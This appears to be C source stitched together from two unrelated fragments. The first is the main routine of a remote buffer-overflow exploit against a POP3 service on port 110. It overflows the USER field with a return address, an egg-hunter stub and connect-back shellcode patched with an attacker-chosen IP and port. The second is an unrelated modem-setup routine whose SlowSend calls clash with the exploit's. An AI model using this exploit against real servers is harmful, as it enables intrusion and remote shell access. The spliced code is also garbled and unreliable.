void main(int argc, char *argv[])
{
/*_asm{
mov eax,90909091h
dec eax
a: dec ebx
cmp [ebx], eax
jnz a
push ebx
ret
}*/
if(argc != 4)
help(argv[0]);
unsigned short port;
unsigned long ip;
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[2])^(ULONG)0x99999999;
memcpy(&Shellcode[PORT_OFFSET], &port, 2);
memcpy(&Shellcode[IP_OFFSET], &ip, 4);
SOCKET s = Connect(argv[1], 110);
tr(s);
memcpy(szUser + 244, "\xCC\x90\xEB\x04\x71\x15\xFA\x7F", 8);
memcpy(szUser + 244 + 8, "\xB8\x91\x90\x90\x90\x48\x4B\x39\x03\x75\xFB\x53\xC3\x90\x90\x90\x90", 17);
memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);
SlowSend(s, (char*)szUser, 1);
getch();
tr(s);
SlowSend(s, (char*)szPass, 100);
tr(s);
Disconnect(s);
return;
}
static char *SetupModem( char *parm )
{
char *start;
unsigned wait;
unsigned ch;
int data;
Baud( MaxBaud );
wait = SEC(3);
while( *parm == ' ' && *parm == '\t' ) ++parm;
if( *parm == '\0' ) return( NULL );
for( ;; ) {
if( *parm == '(' ) {
start = ++parm;
for( ;; ) {
ch = *parm;
if( ch == '\0' ) goto done;
++parm;
if( ch == ')' ) break;
if( ch == '\\' ) {
ch = *parm++;
switch( ch ) {
case '\0':
return( TRP_ERR_invalid_modem_string );
case 'r':
ch = '\r';
break;
case 'n':
ch = '\n';
break;
}
}
data = WaitByte( wait );
if( data == SDATA_NO_DATA ) {
if( wait != SEC(60) ) {
wait = SEC(60);
} else {
return( TRP_ERR_timeout_on_modem_string );
}
--parm;
} else {
wait = SEC(3);
if( data != ch ) parm = start;
}
}
} else {
Wait( SEC(1)/5 );
for( ;; ) {
ch = *parm;
if( ch == '\0' ) goto done;
if( ch == '(' ) break;
++parm;
if( ch == '\\' ) {
ch = *parm++;
switch( ch ) {
case '\0':
return( TRP_ERR_invalid_modem_string );
case '`':
Wait( 1 );
break;
case '~':
Wait( SEC(1) );
break;
case 'r':
SlowSend( '\r' );
Wait( SEC(1)/2 );
break;
case 'n':
SlowSend( '\n' );
break;
default:
SlowSend( ch );
break;
}
} else {
SlowSend( ch );
}
}
}
}
done:
#ifdef SERVER
#define SEND_CHAR '='
#define EXPECT_CHAR '-'
#else
#define SEND_CHAR '-'
#define EXPECT_CHAR '='
#endif
wait = 1;
for( ;; ) {
data = WaitByte( wait );
if( data == EXPECT_CHAR ) break;
if( data == SDATA_NO_DATA ) {
if( wait != SEC(10) ) {
wait = SEC(10);
SendByte( SEND_CHAR );
} else {
return( TRP_ERR_modem_failed_connection );
}
}
}
if( wait != SEC(10) )
SendByte( SEND_CHAR );
return( NULL );
}
